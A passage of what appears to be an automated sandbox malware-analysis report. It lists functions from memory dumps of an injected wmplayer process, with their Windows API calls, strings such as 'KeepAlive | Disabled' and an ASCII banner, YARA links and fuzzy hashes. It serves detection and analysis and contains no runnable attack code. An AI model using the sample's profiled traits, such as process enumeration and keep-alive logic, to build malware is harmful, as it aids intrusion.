                                                                                            Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                            • SetEvent.KERNEL32(0000026C), ref: 00404AF9
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                            • String ID: KeepAlive | Disabled
                                                                                            • API String ID: 2993684571-305739064
                                                                                            • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                            • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                            • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                            • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                            Function 00419F32 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                            • String ID: Alarm triggered
                                                                                            • API String ID: 614609389-2816303416
                                                                                            • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                            • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                            • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                            • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                            Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                            Strings
                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                            • API String ID: 3024135584-2418719853
                                                                                            • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                            • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                            Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                            • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                            • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                            • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                            Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                              • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                              • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                              • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 2180151492-0
                                                                                            • Opcode ID: 8ed805619018687b8c3253cfdac70904094ea72a7bd7bf631ac512d0263f82af
                                                                                            • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                            • Opcode Fuzzy Hash: 8ed805619018687b8c3253cfdac70904094ea72a7bd7bf631ac512d0263f82af
                                                                                            • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                            Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                            • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                            • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                            Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                            • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                            • __freea.LIBCMT ref: 0044FFC4
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                            • String ID:
                                                                                            • API String ID: 313313983-0
                                                                                            • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                            • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                            • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                            • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                            Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                            • _free.LIBCMT ref: 0044E1A0
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                            • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                            • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                            • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                            Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                            • _free.LIBCMT ref: 100071B8
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                            • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                            • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                            • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                            Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                            • _free.LIBCMT ref: 00446F7D
                                                                                            • _free.LIBCMT ref: 00446FA4
                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                            • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                            • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                            • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                            Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                            • _free.LIBCMT ref: 10005BB4
                                                                                            • _free.LIBCMT ref: 10005BDB
                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                            • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                            • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                            • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                            Function 0041B37D Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                            • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseHandleOpen$FileImageName
                                                                                            • String ID:
                                                                                            • API String ID: 2951400881-0
                                                                                            • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                            • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                            • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                            • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                            Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                            • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                            • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$lstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 493641738-0
                                                                                            • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                            • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                            • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                            • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                            Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0044F7B5
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 0044F7C7
                                                                                            • _free.LIBCMT ref: 0044F7D9
                                                                                            • _free.LIBCMT ref: 0044F7EB
                                                                                            • _free.LIBCMT ref: 0044F7FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                            • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                            • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                            Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 100091D0
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 100091E2
                                                                                            • _free.LIBCMT ref: 100091F4
                                                                                            • _free.LIBCMT ref: 10009206
                                                                                            • _free.LIBCMT ref: 10009218
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                            • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                            • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                            • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                            Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00443305
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 00443317
                                                                                            • _free.LIBCMT ref: 0044332A
                                                                                            • _free.LIBCMT ref: 0044333B
                                                                                            • _free.LIBCMT ref: 0044334C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
